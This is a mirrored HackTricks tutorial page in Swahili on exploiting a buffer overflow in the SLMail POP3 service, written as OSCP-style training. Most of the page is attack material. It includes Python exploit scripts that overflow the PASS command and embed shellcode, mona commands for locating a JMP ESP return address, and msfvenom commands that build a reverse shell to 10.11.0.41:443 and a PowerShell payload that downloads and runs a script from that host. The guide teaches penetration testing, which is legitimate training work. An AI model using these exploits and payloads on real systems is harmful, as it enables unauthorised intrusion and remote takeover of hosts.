Mirrors/hacktricks

Fork 0

mirror of https://github.com/carlospolop/hacktricks synced 2024-11-26 06:30:37 +00:00

CPol 6857e6d270

GitBook: No commit message

2024-04-06 19:39:38 +00:00

10 KiB

Raw Blame History

Kudukiza Windows (Mwongozo wa Msingi - OSCP lvl)

Jifunze kudukiza AWS kutoka sifuri hadi shujaa na htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)!

Njia nyingine za kusaidia HackTricks:

Ikiwa unataka kuona kampuni yako inatangazwa kwenye HackTricks au kupakua HackTricks kwa muundo wa PDF Angalia MPANGO WA KUJIUNGA!
Pata swag rasmi ya PEASS & HackTricks
Gundua The PEASS Family, mkusanyiko wetu wa NFTs ya kipekee
Jiunge na 💬 Kikundi cha Discord au kikundi cha telegram au tufuate kwenye Twitter 🐦 @hacktricks_live.
Shiriki mbinu zako za kudukiza kwa kuwasilisha PRs kwenye HackTricks na HackTricks Cloud repos za github.

Anza kusakinisha huduma ya SLMail

Anza upya huduma ya SLMail

Kila wakati unahitaji kuanza upya huduma ya SLMail, unaweza kufanya hivyo kwa kutumia konsoli ya Windows:

net start slmail

Kigezo cha shambulio la msingi la Python

#!/usr/bin/python

import socket

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
ip = '10.11.25.153'
port = 110

buffer = 'A' * 2700
try:
print "\nLaunching exploit..."
s.connect((ip, port))
data = s.recv(1024)
s.send('USER username' +'\r\n')
data = s.recv(1024)
s.send('PASS ' + buffer + '\r\n')
print "\nFinished!."
except:
print "Could not connect to "+ip+":"+port

Badilisha Font ya Immunity Debugger

Nenda kwenye Chaguo >> Muonekano >> Fonti >> Badilisha (Consolas, Blod, 9) >> OK

Ambatisha mchakato kwenye Immunity Debugger:

Faili --> Ambatisha

Na bonyeza kitufe cha KUANZA

Tuma shambulizi na angalia ikiwa EIP imeathiriwa:

Kila wakati unapovunja huduma, unapaswa kuizindua tena kama ilivyoelezwa mwanzoni mwa ukurasa huu.

Unda mfano wa kubadilisha EIP

Mfano huo lazima uwe mkubwa kama kichupo ulichotumia kuvunja huduma hapo awali.

/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 3000

Badilisha buffer ya shambulio na weka mfano na anzisha shambulio.

Kosa jipya linapaswa kuonekana, lakini na anwani tofauti ya EIP:

Angalia ikiwa anwani ilikuwa kwenye mfano wako:

/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -l 3000 -q 39694438

Inaonekana tunaweza kubadilisha EIP katika offset 2606 ya buffer.

Angalia kwa kubadilisha buffer ya shambulizi:

buffer = 'A'*2606 + 'BBBB' + 'CCCC'

Kwa kifurushi hiki, EIP iliyoharibika inapaswa kuonyesha 42424242 ("BBBB")

Inaonekana kama inafanya kazi.

Angalia nafasi ya Shellcode ndani ya stack

600B inapaswa kuwa ya kutosha kwa shellcode yenye nguvu yoyote.

Hebu tubadilishe kifurushi:

buffer = 'A'*2606 + 'BBBB' + 'C'*600

zindua shambulio jipya na angalia EBP na urefu wa shellcode inayoweza kutumika

Unaweza kuona kuwa wakati udhaifu unafikiwa, EBP inaelekeza kwa shellcode na tuna nafasi nyingi ya kuweka shellcode hapa.

Katika kesi hii tuna kutoka 0x0209A128 hadi 0x0209A2D6 = 430B. Inatosha.

Angalia herufi mbaya

Badilisha tena buffer:

badchars = (
"\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10"
"\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20"
"\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30"
"\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50"
"\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60"
"\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70"
"\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80"
"\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90"
"\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0"
"\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0"
"\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0"
"\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0"
"\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0"
"\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0"
"\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"
)
buffer = 'A'*2606 + 'BBBB' + badchars

badchars huanza katika 0x01 kwa sababu 0x00 mara nyingi ni mbaya.

Tekeleza mara kwa mara shambulio na kifurushi kipya kikiacha herufi ambazo zinaonekana kuwa hazina maana:.

Kwa mfano:

Katika kesi hii unaweza kuona kwamba hautaki kutumia herufi 0x0A (hakuna kitu kinachohifadhiwa kwenye kumbukumbu tangu herufi 0x09).

Katika kesi hii unaweza kuona kwamba herufi 0x0D inaepukwa:

Tafuta JMP ESP kama anwani ya kurudi

Kutumia:

!mona modules    #Get protections, look for all false except last one (Dll of SO)

Utaweka orodha ya ramani za kumbukumbu. Tafuta DLl ambayo ina:

Rebase: False
SafeSEH: False
ASLR: False
NXCompat: False
OS Dll: True

Sasa, ndani ya kumbukumbu hii unapaswa kupata baadhi ya herufi za JMP ESP, ili kufanya hivyo tekeleza:

!mona find -s "\xff\xe4" -m name_unsecure.dll # Search for opcodes insie dll space (JMP ESP)
!mona find -s "\xff\xe4" -m slmfc.dll # Example in this case

Kisha, ikiwa anwani fulani imepatikana, chagua moja ambayo haichukui herufi mbaya:

Katika kesi hii, kwa mfano: _0x5f4a358f_

Unda shellcode

msfvenom -p windows/shell_reverse_tcp LHOST=10.11.0.41 LPORT=443 -f c -b '\x00\x0a\x0d'
msfvenom -a x86 --platform Windows -p windows/exec CMD="powershell \"IEX(New-Object Net.webClient).downloadString('http://10.11.0.41/nishang.ps1')\"" -f python -b '\x00\x0a\x0d'

Ikiwa shambulio halifanyi kazi lakini linapaswa (unaweza kuona na ImDebg kwamba shellcode inafikiwa), jaribu kuunda shellcodes nyingine (msfvenom itaunda shellcodes tofauti kwa vigezo sawa).

Ongeza NOPS kadhaa mwanzoni mwa shellcode na itumie pamoja na anwani ya kurudi kwa JMP ESP, na kamilisha shambulio:

#!/usr/bin/python

import socket

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
ip = '10.11.25.153'
port = 110

shellcode = (
"\xb8\x30\x3f\x27\x0c\xdb\xda\xd9\x74\x24\xf4\x5d\x31\xc9\xb1"
"\x52\x31\x45\x12\x83\xed\xfc\x03\x75\x31\xc5\xf9\x89\xa5\x8b"
"\x02\x71\x36\xec\x8b\x94\x07\x2c\xef\xdd\x38\x9c\x7b\xb3\xb4"
"\x57\x29\x27\x4e\x15\xe6\x48\xe7\x90\xd0\x67\xf8\x89\x21\xe6"
"\x7a\xd0\x75\xc8\x43\x1b\x88\x09\x83\x46\x61\x5b\x5c\x0c\xd4"
"\x4b\xe9\x58\xe5\xe0\xa1\x4d\x6d\x15\x71\x6f\x5c\x88\x09\x36"
"\x7e\x2b\xdd\x42\x37\x33\x02\x6e\x81\xc8\xf0\x04\x10\x18\xc9"
"\xe5\xbf\x65\xe5\x17\xc1\xa2\xc2\xc7\xb4\xda\x30\x75\xcf\x19"
"\x4a\xa1\x5a\xb9\xec\x22\xfc\x65\x0c\xe6\x9b\xee\x02\x43\xef"
"\xa8\x06\x52\x3c\xc3\x33\xdf\xc3\x03\xb2\x9b\xe7\x87\x9e\x78"
"\x89\x9e\x7a\x2e\xb6\xc0\x24\x8f\x12\x8b\xc9\xc4\x2e\xd6\x85"
"\x29\x03\xe8\x55\x26\x14\x9b\x67\xe9\x8e\x33\xc4\x62\x09\xc4"
"\x2b\x59\xed\x5a\xd2\x62\x0e\x73\x11\x36\x5e\xeb\xb0\x37\x35"
"\xeb\x3d\xe2\x9a\xbb\x91\x5d\x5b\x6b\x52\x0e\x33\x61\x5d\x71"
"\x23\x8a\xb7\x1a\xce\x71\x50\x2f\x04\x79\x89\x47\x18\x79\xd8"
"\xcb\x95\x9f\xb0\xe3\xf3\x08\x2d\x9d\x59\xc2\xcc\x62\x74\xaf"
"\xcf\xe9\x7b\x50\x81\x19\xf1\x42\x76\xea\x4c\x38\xd1\xf5\x7a"
"\x54\xbd\x64\xe1\xa4\xc8\x94\xbe\xf3\x9d\x6b\xb7\x91\x33\xd5"
"\x61\x87\xc9\x83\x4a\x03\x16\x70\x54\x8a\xdb\xcc\x72\x9c\x25"
"\xcc\x3e\xc8\xf9\x9b\xe8\xa6\xbf\x75\x5b\x10\x16\x29\x35\xf4"
"\xef\x01\x86\x82\xef\x4f\x70\x6a\x41\x26\xc5\x95\x6e\xae\xc1"
"\xee\x92\x4e\x2d\x25\x17\x7e\x64\x67\x3e\x17\x21\xf2\x02\x7a"
"\xd2\x29\x40\x83\x51\xdb\x39\x70\x49\xae\x3c\x3c\xcd\x43\x4d"
"\x2d\xb8\x63\xe2\x4e\xe9"
)

buffer = 'A' * 2606 + '\x8f\x35\x4a\x5f' + "\x90" * 8 + shellcode
try:
print "\nLaunching exploit..."
s.connect((ip, port))
data = s.recv(1024)
s.send('USER username' +'\r\n')
data = s.recv(1024)
s.send('PASS ' + buffer + '\r\n')
print "\nFinished!."
except:
print "Could not connect to "+ip+":"+port

{% hint style="warning" %} Kuna shellcodes ambazo zitajibadilisha wenyewe, kwa hivyo ni muhimu kuongeza NOPs kabla ya shellcode {% endhint %}

Kuboresha shellcode

Ongeza vipimo hivi:

EXITFUNC=thread -e x86/shikata_ga_nai

Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)!